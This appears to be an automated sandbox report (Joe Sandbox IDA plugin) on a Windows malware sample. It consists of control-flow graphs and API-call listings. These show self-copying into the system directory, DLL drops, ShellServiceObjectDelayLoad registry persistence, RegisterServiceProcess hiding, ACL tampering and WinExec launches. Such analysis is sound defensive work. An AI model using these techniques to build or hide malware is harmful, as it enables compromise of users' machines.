2916->2917 2918 405a20 sprintf rand 2917->2918 2919 405a0c strcat 2917->2919 2920 405a70 strcat rand 2918->2920 2921 405a5c strcat 2918->2921 2919->2918 2922 405ab0 rand sprintf rand 2920->2922 2923 405a9c strcat 2920->2923 2921->2920 2924 405af3 strcat 2922->2924 2925 405b07 strcat rand 2922->2925 2923->2922 2924->2925 2926 405b39 strcat 2925->2926 2927 405b4d rand 2925->2927 2926->2927 2928 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2927->2928 2929 405b5f rand sprintf 2927->2929 2930 405c04 2928->2930 2929->2928 2930->2850 2930->2854 2932 4079e4 2931->2932 2933 405620 FindFirstUrlCacheEntryA 2932->2933 2934 405663 _stricmp 2933->2934 2937 405685 2933->2937 2935 4056a7 FindNextUrlCacheEntryA 2934->2935 2934->2937 2936 4056c9 _stricmp 2935->2936 2935->2937 2936->2937 2938 4056fb 2936->2938 2937->2868 2938->2935 2940 403775 2939->2940 2941 403779 SetFilePointer WriteFile CloseHandle 2939->2941 2940->2876 2941->2940 2948 40421f RegCreateKeyExA 2942->2948 2946 40421f 4 API calls 2945->2946 2947 4041ee InterlockedIncrement memset 2946->2947 2947->2887 2949 404262 RegSetValueExA 2948->2949 2950 404219 2948->2950 2951 404288 RegCloseKey 2949->2951 2952 40427c RegCloseKey 2949->2952 2950->2879 2951->2950 2952->2950 2954 401634 2953->2954 2955 401638 strcat sprintf rand 2954->2955 2956 40160e rand 2954->2956 2955->2898 2955->2899 2956->2954 3006 4037aa 3007 4037c8 printf printf 3006->3007 3009 40380d 3007->3009 3010 4037fa printf 3009->3010 3012 403812 printf 3009->3012 3010->3009 3013 4035ab 3014 4079e4 3013->3014 3015 4035b8 vsprintf 3014->3015 3018 4035f9 MessageBoxA 3015->3018 3017 4035ea 3018->3017 2757 40686c lstrlenA 2758 405f5b 9 API calls 2757->2758 2759 40689a 2758->2759 2760 4068a1 WinExec 2759->2760 2761 4068a9 2759->2761 2760->2761 2957 40328f 2958 402efd 2957->2958 2959 402cd7 3 API calls 2958->2959 2960 4033ce 2958->2960 2961 40289a 4 API calls 2958->2961 2962 4030e5 GetModuleHandleA 2958->2962 2963 40314c VirtualQuery 2958->2963 2965 402f98 
GlobalMemoryStatus 2958->2965 2966 402f6f IsBadReadPtr 2958->2966 2967 403059 CloseHandle 2958->2967 2959->2958 2961->2958 2962->2958 2963->2958 2964 4031b1 IsBadWritePtr 2963->2964 2964->2958 2965->2958 2966->2958 2967->2958 2968 407892 2969 40789e 2968->2969 2970 407910 2969->2970 2971 4078fe CallWindowProcA 2969->2971 2971->2970 3019 405133 10 API calls 3020 40429c 4 API calls 3019->3020 3021 405264 3020->3021 3022 405278 3021->3022 3023 40526b LocalFree 3021->3023 3025 40509b 6 API calls 3022->3025 3024 4054d0 3023->3024 3026 40527d ExpandEnvironmentStringsA 3025->3026 3045 404532 3026->3045 3029 4052d3 LocalFree 3029->3024 3030 4052ec strcat strcat 3031 40431f 4 API calls 3030->3031 3032 405315 memset 3031->3032 3033 405360 3032->3033 3034 40537c CreateProcessA 3032->3034 3033->3034 3035 4053ac CloseHandle sprintf 3034->3035 3044 405469 3034->3044 3037 405413 3035->3037 3036 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3036->3024 3038 4053e5 FindWindowA 3037->3038 3039 40541d 3037->3039 3038->3039 3040 405402 Sleep 3038->3040 3041 405421 Sleep 3039->3041 3039->3044 3040->3037 3042 405434 Sleep 3041->3042 3043 40543e GetWindowTextA 3041->3043 3042->3043 3043->3044 3044->3036 3046 40453f 3045->3046 3047 403619 5 API calls 3046->3047 3048 404570 3047->3048 3049 404579 3048->3049 3050 404596 lstrlenA LocalAlloc GetTempPathA 3048->3050 3051 404589 LocalFree 3048->3051 3049->3029 3049->3030 3052 404604 3050->3052 3051->3049 3052->3052 3053 4015ea rand 3052->3053 3054 40461d strcat sprintf rand 3053->3054 3055 404655 strcat 3054->3055 3056 404668 rand 3054->3056 3055->3056 3057 40467a rand sprintf 3056->3057 3058 40469d rand 3056->3058 3057->3058 3059 4046bb strcat 3058->3059 3060 4046ce strcat rand 3058->3060 3059->3060 3061 4046f3 strcat 3060->3061 3062 404706 rand 3060->3062 3061->3062 3063 404741 sprintf rand 3062->3063 3064 40471e rand sprintf 3062->3064 3065 404770 strcat 3063->3065 3066 404783 strcat rand 3063->3066 3064->3063 3065->3066 3067 
4047a8 strcat 3066->3067 3068 4047bb strcat rand 3066->3068 3067->3068 3069 4047e6 rand sprintf 3068->3069 3070 404809 rand sprintf sprintf rand 3068->3070 3069->3070 3071 404859 rand sprintf 3070->3071 3072 40487c rand 3070->3072 3071->3072 3073 404894 strcat 3072->3073 3074 4048a7 rand 3072->3074 3073->3074 3075 4048b9 strcat 3074->3075 3076 4048cc rand 3074->3076 3075->3076 3077 4048f1 sprintf rand 3076->3077 3078 4048de strcat 3076->3078 3079 404926 strcat 3077->3079 3080 404939 rand 3077->3080 3078->3077 3079->3080 3081 40494b strcat 3080->3081 3082 40495e rand 3080->3082 3081->3082 3083 404976 rand sprintf 3082->3083 3084 404999 3082->3084 3083->3084 3087 4049a3 3084->3087 3111 404b12 3084->3111 3085 4043bf 2 API calls 3085->3111 3086 404b07 3088 404c87 strcat rand 3086->3088 3087->3086 3091 404a4b sprintf rand 3087->3091 3092 4049d9 sprintf 3087->3092 3089 404cac strcat 3088->3089 3090 404cbf rand 3088->3090 3089->3090 3093 404cd1 strcat 3090->3093 3094 404ce4 rand 3090->3094 3095 404a82 strcat 3091->3095 3096 404a95 rand 3091->3096 3092->3087 3093->3094 3098 404cf6 strcat 3094->3098 3099 404d09 strcat rand 3094->3099 3095->3096 3100 404aa7 strcat 3096->3100 3101 404aba rand 3096->3101 3097 404b47 sprintf 3097->3111 3098->3099 3102 404d34 rand sprintf 3099->3102 3103 404d57 rand 3099->3103 3100->3101 3101->3087 3104 404acc strcat 3101->3104 3102->3103 3105 404d69 strcat 3103->3105 3106 404d7c rand 3103->3106 3104->3087 3105->3106 3107 404da1 rand 3106->3107 3108 404d8e strcat 3106->3108 3109 404db9 strcat 3107->3109 3110 404dcc rand 3107->3110 3108->3107 3109->3110 3112 404e01 strcat rand 3110->3112 3113 404dde rand sprintf 3110->3113 3111->3085 3111->3088 3111->3097 3138 40447a lstrlenA LocalAlloc 3111->3138 3115 404e2c strcat 3112->3115 3116 404e3f strcat rand 3112->3116 3113->3112 3115->3116 3118 404e64 strcat 3116->3118 3119 404e77 strcat rand 3116->3119 3118->3119 3122 404ea2 strcat 3119->3122 3123 404eb5 sprintf rand 3119->3123 3120 404c02 rand 3124 
404c14 strcat 3120->3124 3125 404c27 rand 3120->3125 3121 404bef strcat 3121->3120 3122->3123 3126 404ee3 strcat 3123->3126 3127 404ef6 strcat rand 3123->3127 3124->3125 3128 404c39 strcat 3125->3128 3129 404c4c LocalFree 3125->3129 3126->3127 3130 404f27 strcat 3127->3130 3131 404f3a rand sprintf rand 3127->3131 3128->3129 3129->3111 3130->3131 3132 404f77 strcat 3131->3132 3133 404f8a strcat rand 3131->3133 3132->3133 3134 404fb5 strcat 3133->3134 3135 404fc8 rand 3133->3135 3134->3135 3136 404fda rand sprintf 3135->3136 3137 404ffd 7 API calls 3135->3137 3136->3137 3137->3049 3139 4044b6 3138->3139 3140 4044d9 sprintf 3139->3140 3141 40452a sprintf rand 3139->3141 3140->3139 3141->3120 3141->3121 3142 401b33 3145 401aa4 3142->3145 3143 401b13 3144 401ae6 sprintf 3147 40129c 3144->3147 3145->3143 3145->3144 3148 4012a9 CreateFileA 3147->3148 3149 4079e4 3147->3149 3150 4012db ReadFile CloseHandle 3148->3150 3151 4012d7 3148->3151 3149->3148 3150->3151 3151->3143 3152 4036b3 CreateFileA 3153 4036e7 SetFilePointer 3152->3153 3154 4036e3 3152->3154 3155 403701 3153->3155 3155->3155 3156 403708 WriteFile WriteFile CloseHandle 3155->3156 3156->3154 2762 406ff6 2763 4071a4 2762->2763 2764 40701f 2762->2764 2765 40717e 2763->2765 2766 4071be DestroyWindow 2763->2766 2767 407021 2764->2767 2768 40702f 2764->2768 2766->2765 2769 407184 2767->2769 2770 40702a 2767->2770 2771 407289 GetWindowTextA 2768->2771 2772 40703a 2768->2772 2769->2765 2778 407198 PostQuitMessage 2769->2778 2773 4077cc DefWindowProcA 2770->2773 2776 4072c9 GetWindowTextA 2771->2776 2777 4072a9 MessageBoxA SetFocus 2771->2777 2774 407041 2772->2774 2775 40705c 2772->2775 2773->2765 2774->2770 2774->2773 2783 4071cb 2774->2783 2779 407149 2775->2779 2818 405ffa 2775->2818 2780 407322 2776->2780 2781 407302 MessageBoxA SetFocus 2776->2781 2777->2765 2778->2765 2779->2765 2825 406075 2779->2825 2787 407337 MessageBoxA SetFocus 2780->2787 2795 407357 2780->2795 2781->2765 2783->2765 2788 407224 
SetTextColor 2783->2788 2790 407233 SetTextColor 2783->2790 2786 405ffa 3 API calls 2789 40709b GetWindowRect 2786->2789 2787->2765 2791 40723d SetBkColor CreateBrushIndirect 2788->2791 2789->2779 2792 4070be GetWindowRect 2789->2792 2790->2791 2791->2765 2792->2779 2794 4070d4 2792->2794 2793 4073a7 sprintf GetWindowTextA 2797 40740f sprintf GetWindowTextA 2793->2797 2798 4073ef MessageBoxA SetFocus 2793->2798 2794->2779 2799 407112 MoveWindow 2794->2799 2795->2793 2796 407376 MessageBoxA SetFocus 2795->2796 2796->2765 2800 407477 sprintf GetWindowTextA 2797->2800 2801 407457 MessageBoxA SetFocus 2797->2801 2798->2765 2799->2779 2802 4074d9 2800->2802 2803 4074b9 MessageBoxA SetFocus 2800->2803 2801->2765 2804 4074ee MessageBoxA SetFocus 2802->2804 2806 40750e 2802->2806 2803->2765 2804->2765 2805 40755e sprintf GetWindowTextA 2808 4075a6 MessageBoxA SetFocus 2805->2808 2809 4075c6 2805->2809 2806->2805 2807 40752d MessageBoxA SetFocus 2806->2807 2807->2765 2808->2765 2810 407627 sprintf CreateFileA SetFilePointer 2809->2810 2812 4075e5 MessageBoxA SetFocus 2809->2812 2811 40768e 2810->2811 2811->2811 2813 407695 WriteFile WriteFile 2811->2813 2812->2765 2814 4076db 2813->2814 2814->2814 2815 4076e2 6 API calls 2814->2815 2816 40776e 2815->2816 2816->2816 2817 407775 WriteFile WriteFile CloseHandle ShowWindow 2816->2817 2817->2765 2819 4079e4 2818->2819 2820 406007 GetWindow 2819->2820 2821 406020 2820->2821 2822 406028 GetClassNameA 2821->2822 2823 406024 2821->2823 2824 40605f GetWindow 2821->2824 2822->2821 2823->2786 2824->2821 2826 405ffa 3 API calls 2825->2826 2827 406096 2826->2827 2828 405ffa 3 API calls 2827->2828 2829 4060a3 10 API calls 2828->2829 2830 406224 SendMessageA 2829->2830 2831 40623a SendMessageA 2829->2831 2832 40624e CreateWindowExA CreateWindowExA 2830->2832 2831->2832 2833 406333 2832->2833 2834 4062cb sprintf SendMessageA sprintf SendMessageA 2833->2834 2835 40633c 34 API calls 2833->2835 2834->2833 2835->2765 2972 401219 2973 40121f 
__GetMainArgs 2972->2973 2974 407980 173 API calls 2973->2974 2975 401284 exit 2974->2975 2976 40109a 2984 40109b 2976->2984 2977 40117f 2978 40118e signal 2977->2978 2979 4011a8 signal 2978->2979 2980 4011c9 2978->2980 2979->2980 2981 40117b 2979->2981 2980->2981 2982 4011ce signal raise 2980->2982 2982->2981 2984->2977 2984->2978 2984->2981 2985 40107a RtlUnwind 2984->2985 2985->2984 2836 40237b 2837 402333 _sleep 2836->2837 2838 402355 2836->2838 2839 401b9f 23 API calls 2837->2839 2840 40234c 2839->2840 2840->2837 2840->2838 2986 40109b 2987 40117f 2986->2987 2994 4010c3 2986->2994 2988 40118e signal 2987->2988 2989 4011a8 signal 2988->2989 2990 4011c9 2988->2990 2989->2990 2991 40117b 2989->2991 2990->2991 2992 4011ce signal raise 2990->2992 2992->2991 2994->2988 2994->2991 2995 40107a RtlUnwind 2994->2995 2995->2994 2996 40129b 2997 4079e4 2996->2997 2998 4012a9 CreateFileA 2997->2998 2999 4012db ReadFile CloseHandle 2998->2999 3000 4012d7 2998->3000 2999->3000 2712 40365e 2713 403664 GetFileSize LocalAlloc 2712->2713 2714 403684 ReadFile CloseHandle 2713->2714 2716 4036ae 2714->2716 2531 40121f __GetMainArgs 2534 407980 GetCommandLineA 2531->2534 2535 407991 strchr 2534->2535 2537 4079a6 2534->2537 2536 4079cf GetModuleHandleA 2535->2536 2535->2537 2540 406c29 OpenMutexA 2536->2540 2537->2536 2541 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2540->2541 2542 406c5f CloseHandle exit 2540->2542 2543 406cd6 2541->2543 2542->2541 2544 406ce4 rand 2543->2544 2545 406e07 9 API calls 2543->2545 2547 406d5f 2544->2547 2587 402e06 2545->2587 2549 406d69 rand 2547->2549 2550 406d2f rand 2547->2550 2553 406d8a sprintf CopyFileA 2549->2553 2554 406d7c 2549->2554 2550->2547 2551 406f65 2603 4023a7 CreateThread CloseHandle 2551->2603 2552 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2552->2551 2564 403ce9 rand 2553->2564 2554->2553 2558 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2560 406fdc GetMessageA 
2558->2560 2655 4068b0 2558->2655 2673 40682b 2558->2673 2562 406fc4 TranslateMessage DispatchMessageA 2560->2562 2563 401284 exit 2560->2563 2562->2560 2565 403d27 2564->2565 2566 403d2e 2564->2566 2575 403f68 rand 2565->2575 2604 403619 CreateFileA 2566->2604 2569 403d47 memcpy memset 2571 403da1 rand rand rand rand memcpy 2569->2571 2572 403e64 2571->2572 2610 403bbe 2572->2610 2576 404002 2575->2576 2577 403fd4 rand 2576->2577 2578 404009 rand 2576->2578 2577->2576 2579 40402a 6 API calls 2578->2579 2580 40401c 2578->2580 2615 404148 RegCreateKeyExA 2579->2615 2580->2579 2582 4040f5 2583 404148 3 API calls 2582->2583 2584 404125 2583->2584 2585 404148 3 API calls 2584->2585 2586 40413a WinExec ExitProcess 2585->2586 2588 402e13 2587->2588 2618 402822 6 API calls 2588->2618 2590 402e1b GetVersion 2591 402e2e 2590->2591 2592 402e79 LoadLibraryA GetProcAddress 2591->2592 2602 402ef6 2591->2602 2592->2591 2593 4033ce GetVersion 2593->2551 2593->2552 2595 4030e5 GetModuleHandleA 2595->2602 2596 40314c VirtualQuery 2597 4031b1 IsBadWritePtr 2596->2597 2596->2602 2597->2602 2598 402f98 GlobalMemoryStatus 2598->2602 2599 402f6f IsBadReadPtr 2599->2602 2601 403059 CloseHandle 2601->2602 2602->2593 2602->2595 2602->2596 2602->2598 2602->2599 2602->2601 2619 40289a 2602->2619 2623 402cd7 2602->2623 2603->2558 2632 4022ee 2603->2632 2605 403664 GetFileSize LocalAlloc 2604->2605 2607 40364e 2604->2607 2606 403684 ReadFile CloseHandle 2605->2606 2609 4036ae 2606->2609 2607->2605 2607->2609 2609->2565 2609->2569 2612 403bfd 2610->2612 2611 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2611->2565 2612->2611 2613 403c20 rand 2612->2613 2614 403c80 memset memcpy memcpy 2612->2614 2613->2612 2614->2612 2616 404193 2615->2616 2616->2616 2617 40419a RegSetValueExA RegCloseKey 2616->2617 2617->2582 2618->2590 2620 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2619->2620 2622 4029cd 2620->2622 2622->2602 2624 402ceb 2623->2624 2626 402d13 2624->2626 2627 
402a72 2624->2627 2626->2602 2630 402a89 2627->2630 2628 402cd2 2628->2626 2629 402b2a GetModuleHandleA GetProcAddress 2629->2630 2630->2628 2630->2629 2631 402cad GetCurrentProcessId 2630->2631 2631->2630 2633 402333 _sleep 2632->2633 2637 401b9f 2633->2637 2653 4079e4 2637->2653 2654 4079e5 2653->2654 2654->2654 2661 4068c7 2655->2661 2657 406c0c _sleep 2657->2661 2658 403619 5 API calls 2658->2661 2660 406c01 LocalFree 2660->2657 2661->2657 2661->2658 2661->2660 2662 406941 sscanf 2661->2662 2664 406a84 atoi 2661->2664 2665 4069a4 sprintf sprintf 2661->2665 2666 4069db GetWindowsDirectoryA sprintf strcat 2661->2666 2669 406add lstrlenA 2661->2669 2670 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2661->2670 2671 406b9b lstrlenA 2661->2671 2672 406bbe CreateThread CloseHandle 2661->2672 2677 405f5b lstrlenA lstrlenA LocalAlloc 2661->2677 2682 4043bf 2661->2682 2662->2661 2663 406972 rand 2662->2663 2663->2661 2664->2661 2668 406aad sprintf 2664->2668 2667 406a27 DeleteFileA sprintf WinExec 2665->2667 2666->2667 2667->2661 2668->2661 2669->2661 2670->2661 2671->2661 2672->2661 2674 40683b 2673->2674 2690 406753 CreateFileA 2674->2690 2688 407a04 2677->2688 2679 405f9b lstrlenA 2689 407a04 2679->2689 2681 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2681->2661 2683 4043dc 2682->2683 2684 40441a 2683->2684 2685 4043e2 memcpy 2683->2685 2686 404441 lstrlenA 2684->2686 2687 40442f 2684->2687 2685->2687 2686->2687 2687->2661 2688->2679 2689->2681 2691 40678f GetFileSize CloseHandle 2690->2691 2697 40681a _sleep 2690->2697 2698 4013cc RegOpenKeyExA 2691->2698 2697->2674 2699 4013fa 2698->2699 2700 4013fe RegQueryValueExA RegCloseKey 2698->2700 2699->2697 2701 4054d7 6 API calls 2699->2701 2700->2699 2702 405586 2701->2702 2703 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2702->2703 2704 40560e 2703->2704 2704->2697 2705 401348 RegCreateKeyExA 2704->2705 2706 40138a RegSetValueExA RegCloseKey 2705->2706 
2707 401386 2705->2707 2706->2707 2707->2697

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                             • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                             • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                             • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                             • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                             • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Opbieagi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Opbieagi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Opbieagi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Opbieagi,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Opbieagi$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-951892311
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
